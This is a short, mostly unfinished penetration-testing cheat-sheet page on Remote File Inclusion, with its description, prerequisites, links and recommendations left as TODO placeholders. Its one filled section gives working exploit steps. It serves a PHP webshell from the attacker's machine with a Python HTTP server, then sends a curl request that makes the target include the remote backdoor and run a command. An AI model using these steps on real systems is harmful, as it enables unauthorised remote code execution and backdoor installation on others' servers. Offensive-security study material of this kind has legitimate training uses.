Remote File Inclusion
Table of contents
Vulnerability
TODO: Describe the vulnerability here.
Prerequisites
- TODO: List prerequisites here.
Exploit
First, identify a target website that loads external content or resources. Then, prepare a payload. For example, if you target PHP web application, /usr/share/webshells/php/
contains multiple useful webshells. You need to make one of these accessible by your target.
# Go in your payload's directory
cd /usr/share/webshells/php/
# Make it available on port 80
python3 -m http.server 80
# Ask your target to access your payload exposed on your python http server
curl "http://$target/whatever/index.php?page=http://$lhost/simple-backdoor.php&cmd=ls"
Useful links
- TODO: List links here.
Recommendations
- TODO: List recommendations here.